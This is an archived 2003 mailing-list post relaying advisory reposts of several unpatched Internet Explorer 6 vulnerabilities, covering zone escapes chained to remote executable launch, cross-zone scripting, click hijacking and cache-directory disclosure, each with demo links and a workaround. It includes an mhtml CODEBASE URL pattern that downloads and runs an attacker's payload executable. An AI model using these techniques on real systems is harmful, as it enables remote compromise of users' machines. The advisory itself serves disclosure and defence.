Awesome, job security > -----Original Message----- > From: Daniel Ensor [SMTP:densor@xxxxxxxxx] > Sent: Wednesday, November 26, 2003 8:35 AM > To: 'windows2000@xxxxxxxxxxxxx' > Subject: [windows2000] FYI: Multiple vulnerabilities in Internet > Explorer > > Hi List > > Just got this in: > > Cheers > > Dan > -------------------------------------------------------------------- > Integralis S3 Advise .. Integralis S3 Advise .. Integralis S3 Advise > -------------------------------------------------------------------- > > Affected platforms: IE 6.0 with XP SP1 and MS03-048. > Scope for attack: Remote via hostile web page / e-mail. > Effect: Various up to and including remote > code execution leading to compromise of > the users machine. > Resolution: Disable "Active Scripting" in the > INTERNET zone. > > A whole slew of vulnerabilities in Internet Explorer have been released by > prominent IE researcher Liu Die Yu. These affect IE 6 with all the latest > patches applied. In other words they are no patches available for any of > these problems. This presents a "vulnerability window" in which many > desktops will remain vulnerable unless remedial action is taken > immediately. > > > Pete Philips > pete@xxxxxxxxxxxxxxxxxxx > > ----------------------------------------------------------------- > Integralis S3 Advise service > > The following message is reposted complete from the original source. It > has > not been modified by Integralis S3 in any way. > ----------------------------------------------------------------- > > New "Clean" IE Remote Compromise > > [tested] > OS:Win2k3,CN version > IE: with MS03-048 installed. > > OS:WinXp, CN version > Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16 > > [overview] > By combining several vulnerabilities in Internet Explorer, an attacker can > execute his EXE file on victim's system. ("Clean" means: there is no old > published vulnerability involved in this exploit) > > [demo] > There is a harmless demo: > http://www.safecenter.net/UMBRELLAWEBV4/1stCleanRc/1stCleanRc-Demo/index.h > tm > l > (runs harmless demonstration executable) > > [technical details] > First, use MhtRedirParsesLocalFile to parse a local file in an IFRAME, > (Liu > Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirParsesLocalFile) > Then, use BackToFramedJpu to reach MYCOMPUTER zone. > (Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/BackToFramedJpu) > At last, in MYCOMPUTER security zone, use MhtRedirLaunchInetExe to > download > the payload EXE file and execute it. (Liu Die Yu's > http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirLaunchInetExe) > > [Workaround] > Disable Active Scripting in INTERNET zone. > > [Greetings] > greetings to: > Drew Copley, dror, guninski and mkill. > > ----- > all mentioned resources can always be found at UMBRELLA.MX.TC > > [people] > LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn > UMBRELLA.MX.TC ==> How to contact "Liu Die Yu" > > [message] > A wise man learns from other's mistakes; a fool learns from his own. > > [Employment] > I would like to work professionally as a security researcher/bug finder. > > See my resume at my site. I am very eager to work, flexible, and extremely > productive. I have a top notch resume, with credentials from leading bug > finders. I am willing to work per contract, relocate, or telecommute. > > [Give a Hand] > I haven't got a job as a security researcher yet and my family don't > support > my security work - so, I don't have a computer of my own. Please consider > about donating at: http://clik.to/donatepc > > > ----------------------------------------------------------------- > Integralis S3 Advise service > > The following message is reposted complete from the original source. It > has > not been modified by Integralis S3 in any way. > ----------------------------------------------------------------- > > MHTML Redirection Leads to Downloading EXE and Executing > > [tested] > OS:Win2k3,CN version > IE: with MS03-048 installed. > > OS:WinXp, CN version > Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16 > > [overview] > A vulnerability in Internet Explorer is found: any attacker that can reach > MYCOMPUTER security zone(a.k.a local zone) is able to download his EXE > file > and execute it. > > [demo] > There is a harmless demo: > http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirLaunchInetExe/MhtRedirLaun > ch > InetExe-Demo.zip > > [technical details] > There is a feature in Internet Explorer when it tries to retrieve a file > embedded in an MHT file, like: > mhtml:[Mhtml_File_Url]![Original_Resource_Url] > If [Original_Resource_Url] cannot be retrieved from [Mhtml_File_Url], IE > will try to download [Original_Resource_Url] and return the downloaded > content. > > It's like as HTTP redirection. > > And CODEBASE execution is a URL-based security check. > (Liu Die Yu's http://continue.to/trie ) > > So, in MYCOMPUTER security, point CODEBASE property of an OBJECT tag with > unused CLSID to: mhtml:file:///C:\No_SUCH_MHT.MHT![Attaker_PayloadEXE_Url] > and then, IE will download [Attaker_PayloadEXE_Url] and execute it. > > [Workaround] > Disable Active Scripting in INTERNET zone. > > [Greetings] > greetings to: > Drew Copley, dror, guninski and mkill. > > ----- > all mentioned resources can always be found at UMBRELLA.MX.TC > > [people] > LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn > UMBRELLA.MX.TC ==> How to contact "Liu Die Yu" > > [message] > A wise man learns from other's mistakes; a fool learns from his own. > > [Employment] > I would like to work professionally as a security researcher/bug finder. > > See my resume at my site. I am very eager to work, flexible, and extremely > productive. I have a top notch resume, with credentials from leading bug > finders. I am willing to work per contract, relocate, or telecommute. > > [Give a Hand] > I haven't got a job as a security researcher yet and my family don't > support > my security work - so, I don't have a computer of my own. Please consider > about donating at: http://clik.to/donatepc > > > ----------------------------------------------------------------- > Integralis S3 Advise service > > The following message is reposted complete from the original source. It > has > not been modified by Integralis S3 in any way. > ----------------------------------------------------------------- > > BackToFramedJpu - a successor of BackToJpu attack > > [tested] > OS:Win2k3,CN version > IE: with MS03-048 installed. > > OS:WinXp, CN version > Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16 > > [overview] > A cross-zone scripting vulnerability has been found in Internet Explorer. > If > a webpage contains some subframe(either FRAME tag or IFRAME tag), its > security zone may be compromised. > > [demo] > There is a harmless demo: > http://www.safecenter.net/UMBRELLAWEBV4/BackToFramedJpu/BackToFramedJpu-My > Pa > ge.htm > > [technical details] > After applying MS03-048 patch, no javascript-protocol URL won't be stored > in > URL history list any more, which means classical "javascript-protocol URL > in > history" attack doesn't work any more. (Liu Die Yu's > http://www.safecenter.net/UMBRELLAWEBV4/BackMyParent2/index.html) > > However, if an attacker do the following things: > Navigate a sub-frame in victim document to a javascript-protocol URL, > (first, navigate sub-frame to attacker's page, and then navigate the > sub-frame a javascript-protocol > URL) > and then navigate the top window away, > At last,navigate back("history.back()"). > > the javascript-protocol URL will be loaded by the top window(victim > document) and script in the javascript-protocol URL will be executed in > the > security zone of victim document - a.k.a cross-site/zone/domain scripting > > [Workaround] > Disable Active Scripting in INTERNET zone. > > [Greetings] > greetings to: > Drew Copley, dror, guninski and mkill. > > ----- > all mentioned resources can always be found at UMBRELLA.MX.TC > > [people] > LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn > UMBRELLA.MX.TC ==> How to contact "Liu Die Yu" > > [message] > A wise man learns from other's mistakes; a fool learns from his own. > > [Employment] > I would like to work professionally as a security researcher/bug finder. > > See my resume at my site. I am very eager to work, flexible, and extremely > productive. I have a top notch resume, with credentials from leading bug > finders. I am willing to work per contract, relocate, or telecommute. > > [Give a Hand] > I haven't got a job as a security researcher yet and my family don't > support > my security work - so, I don't have a computer of my own. Please consider > about donating at: http://clik.to/donatepc > > > ----------------------------------------------------------------- > Integralis S3 Advise service > > The following message is reposted complete from the original source. It > has > not been modified by Integralis S3 in any way. > ----------------------------------------------------------------- > > HijackClickV2 - a successor of HijackClick attack > > [tested] > OS:Win2k3,CN version > IE: with MS03-048 installed. > > OS:WinXp, CN version > Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16 > > [overview] > After applying MS03-048, the original HijackClick exploit doesn't work any > more. With method caching(a.k.a "SaveRef"), HijackClick works again. > > [demo] > There is a harmless demo: > http://www.safecenter.net/UMBRELLAWEBV4/HijackClickV2/HijackClickV2-MyPage > .h > tm > > [technical details] > After applying MS03-048, the original HijackClick exploit doesn't work any > more. (Liu Die Yu's > http://www.safecenter.net/UMBRELLAWEBV4/HijackClick/HijackClick-MyPage.HTM > > Because window.moveBy is inaccessible. Method caching attack can make > window.moveBy accessible again. > > [Workaround] > Disable Active Scripting in INTERNET zone. > > [Greetings] > greetings to: > Drew Copley, dror, guninski and mkill. > > ----- > all mentioned resources can always be found at UMBRELLA.MX.TC > > [people] > LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn > UMBRELLA.MX.TC ==> How to contact "Liu Die Yu" > > [message] > A wise man learns from other's mistakes; a fool learns from his own. > > [Employment] > I would like to work professionally as a security researcher/bug finder. > > See my resume at my site. I am very eager to work, flexible, and extremely > productive. I have a top notch resume, with credentials from leading bug > finders. I am willing to work per contract, relocate, or telecommute. > > [Give a Hand] > I haven't got a job as a security researcher yet and my family don't > support > my security work - so, I don't have a computer of my own. Please consider > about donating at: http://clik.to/donatepc > > > ----------------------------------------------------------------- > Integralis S3 Advise service > > The following message is reposted complete from the original source. It > has > not been modified by Integralis S3 in any way. > ----------------------------------------------------------------- > > Invalid ContentType may disclose cache directory > > [tested] > OS:WinXp, CN version > Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16 > > [overview] > The problem lies in the download function of Internet Explorer. This can > be > exploited by malicious web pages to get cache directory including random > names. > > [demo] > There are two harmless demos: > 1st, online demo, powered by ASP: > http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/threadid10008-Demo > 2nd, demo in ZIP format, powered by NETCAT: > http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/threadid10008-Demo.z > ip > > [technical details] > When CONTENTTYPE in HTTP response is invalid and file extension is "HTM", > the downloaded HTM file will be opened in cache directory, in INTERNET > security zone. > > In the 1st demo, this is done by the following ASP code: > ---------- > response.ContentType = "whocares" > response.AddHeader "content-disposition", "inline; filename=test.htm" > ---------- > > In the 2nd demo, this is done with the help of NETCAT. > > [Workaround] > Disable Active Scripting in INTERNET zone, so HTML page opened in the > cache > can't send information back to the attacker. > > Note for "Invalid ContentType may disclose cache directory" > > This vulnerability("Invalid ContentType may disclose cache directory") > doesn't work on all systems. ("Invalid ContentType may disclose cache > directory", at > http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/) > Please note that execdror6 and LocalZoneInCache also depends on this > vulnerability. > (execdror6: http://www.safecenter.net/UMBRELLAWEBV4/execdror6/ > LocalZoneInCache: > http://www.safecenter.net/UMBRELLAWEBV4/LocalZoneInCache/) > I have spent extra-ordinary time on this issue and here is all i know > about > it: > > First, The code was verified to work on a WinXp system(Simplified Chinese > version) with all patches. Then, I sent LocalZoneInCache to HTTP-EQUIV, > Dror > Shalev and the Pull for testing: It works on Dror Shalev's WinXp > machine(up-to-date) but it doesn't work on the Pull's Win2k system. > (because > he set killbit for Adodb.Stream activeX object.) Soon after that, > HTTP-EQUIV found it does not work on his WinXp system(2-3 weeks old, with > the latest IE patch). Then, to figure out what happened, i formatted disk > and installed Win2k3 and WinXp(both Simplified Chinese version) and then > applied the latest IE patch. Both remote compromise cases(LocalZoneInCache > and execdror6) don't work any more. At last, i reproduced both remote > compromise cases on MSIEv6 running on Simplified Chinese WinXp with the > following patches: SP1;Q828750;Q330994;Q824145(a.k.a MS03-048) > > If you are using IE, please help me test it and send the result directly > to > my emailbox. Thanx in advance. > > [Greetings] > greetings to: > Drew Copley, dror, guninski and mkill. > > ----- > all mentioned resources can always be found at UMBRELLA.MX.TC > > [people] > LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn > UMBRELLA.MX.TC ==> How to contact "Liu Die Yu" > > [Employment] > I would like to work professionally as a security researcher/bug finder. > > See my resume at my site. I am very eager to work, flexible, and extremely > productive. I have a top notch resume, with credentials from leading bug > finders. I am willing to work per contract, relocate, or telecommute. > > [Give a Hand] > I haven't got a job as a security researcher yet and my family don't > support > my security work - so, I don't have a computer of my own. Please consider > about donating at: http://clik.to/donatepc > > > ----------------------------------------------------------------- > Integralis S3 Advise service > > The following message is reposted complete from the original source. It > has > not been modified by Integralis S3 in any way. > ----------------------------------------------------------------- > > Cache Disclosure Leads to MYCOMPUTER Zone and Remote Compromise > > [tested] > OS:WinXp, CN version > Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16 > > [overview] > By combining cache file disclosure and several other unpatched > vulnerabilties, an malicious INTERNET page can reach MYCOMPUTER zone. The > demo uses Adodb.Stream to launch a remote compromise attack. > > [demo] > There are two harmless demos: > Online demo, powered by ASP: > http://www.safecenter.net/UMBRELLAWEBV4/LocalZoneInCache/LocalZoneInCache- > De > mo/index.html > (runs harmless demonstration executable) > > [technical details] > First, place an HTML file in IE cache directory and get its location. (Liu > Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/index.html) > Second, this HTML file can be parsed as an HTML page and treated as in > MYCOMPUTER security zone. (Mindwarper of mlsecurity.com's > http://www.mlsecurity.com/ie/ie.htm) > (Liu Die Yu's > http://www.safecenter.net/UMBRELLAWEBV4/DblSlashForCache/DblSlashForCache- > Co > ntent.htm) > At last, Overwrite NOTEPAD.EXE and make IE launch it by openning a > view-source protocol URL: (HTTP-EQUIV of MALWARE 's > http://www.securityfocus.com/archive/1/343521) > > [Workaround] > Disable Active Scripting in INTERNET zone, so HTML page opened in the > cache > can't send information back to the attacker. > > [Greetings] > greetings to: > Drew Copley, dror, guninski, vadim and mkill. > > ----- > all mentioned resources can always be found at UMBRELLA.MX.TC > > [people] > LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn > UMBRELLA.MX.TC ==> How to contact "Liu Die Yu" > > [Employment] > I would like to work professionally as a security researcher/bug finder. > > See my resume at my site. I am very eager to work, flexible, and extremely > productive. I have a top notch resume, with credentials from leading bug > finders. I am willing to work per contract, relocate, or telecommute. > > [Give a Hand] > I haven't got a job as a security researcher yet and my family don't > support > my security work - so, I don't have a computer of my own. Please consider > about donating at: http://clik.to/donatepc > > > ----------------------------------------------------------------- > Integralis S3 Advise service > > The following message is reposted complete from the original source. It > has > not been modified by Integralis S3 in any way. > ----------------------------------------------------------------- > > IE Remote Compromise by Getting Cache Location > > [tested] > OS:WinXp, CN version > Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16 > > [overview] > With the help of LocalZoneInCache(refer to "[technical details]" part), an > attacker can compromise a user's system even though the user has: 1. > Customized IE cache directory, 2. Applied MS03-048 patch, 3. Set killbit > for > ADODB.STREAM ActiveX. > > [demo] > online demo, powered by ASP: > http://www.safecenter.net/UMBRELLAWEBV4/execdror6/execdror6-Demo/index.htm > l > (runs harmless demonstration executable) > > [technical details] > execdror6 is derived from execdror5. > (Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/execdror5/) > execdror6 differs from execdror5 in that: > 1st, execdror6 uses LocalZoneInCache to reach MYCOMPUTER security zone. > (Liu > Die Yu's > http://www.safecenter.net/UMBRELLAWEBV4/LocalZoneInCache/index.html) > 2nd, execdror6 gets IE cache directory directly from location.href. > (LocalZoneInCache makes attaker's HTML page opened in cache directory.) > > [Workaround] > Disable Active Scripting in INTERNET zone, so HTML page opened in the > cache > can't send information back to the attacker. > > [Greetings] > greetings to: > Drew Copley, dror, guninski, vadim and mkill. > > ----- > all mentioned resources can always be found at UMBRELLA.MX.TC > > [people] > LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn > UMBRELLA.MX.TC ==> How to contact "Liu Die Yu" > > [Employment] > I would like to work professionally as a security researcher/bug finder. > > See my resume at my site. I am very eager to work, flexible, and extremely > productive. I have a top notch resume, with credentials from leading bug > finders. I am willing to work per contract, relocate, or telecommute. > > [Give a Hand] > I haven't got a job as a security researcher yet and my family don't > support > my security work - so, I don't have a computer of my own. Please consider > about donating at: http://clik.to/donatepc > > > > ------------------------------------------------------------------------ > The information you receive/contained herein is to keep you aware of > developments in IT security that have general relevance to your IT systems > environment. Our objective is to provide information to you as rapidly as > possible to alert you to security threats, issues and potential solutions. > In view of the expediency of the information the solutions described will > not necessarily have been fully tested as to their applicability to your > particular environment. Hence you use this information at your sole risk > and > liability. All trademarks are acknowledged as belonging to their > respective > owners. > > Visit the new FDL web - site designed to serve you better - > http://www.fdl.co.uk > > > This message has been sent from Fuerst Day Lawson Ltd and confirms that > the > email has been scanned and to the best of our knowledge is free from virus > infection. The unauthorised use, disclosure, forwarding or copying of this > message and any attachments is strictly prohibited. If you have received > this message in error, please email moderator@xxxxxxxxx This message and > any > attachments, which are confidential and may be privileged, are for the use > of the addressee(s) only. The views and opinions expressed in this email > message are the author's own and may not reflect the views and opinions of > Fuerst Day Lawson Ltd. > ******************************************************** > This Weeks Sponsor SeamlessPlanet.com > Register your domain name for as low as $7.75 per year! > Cheaper than Godaddy..same great service! > http://SeamlessPlanet.com > ******************************************************** > To Unsubscribe, set digest or vacation > mode or view archives use the below link. > > http://thethin.net/win2000list.cfm ******************************************************** This Weeks Sponsor SeamlessPlanet.com Register your domain name for as low as $7.75 per year! Cheaper than Godaddy..same great service! http://SeamlessPlanet.com ******************************************************** To Unsubscribe, set digest or vacation mode or view archives use the below link. http://thethin.net/win2000list.cfm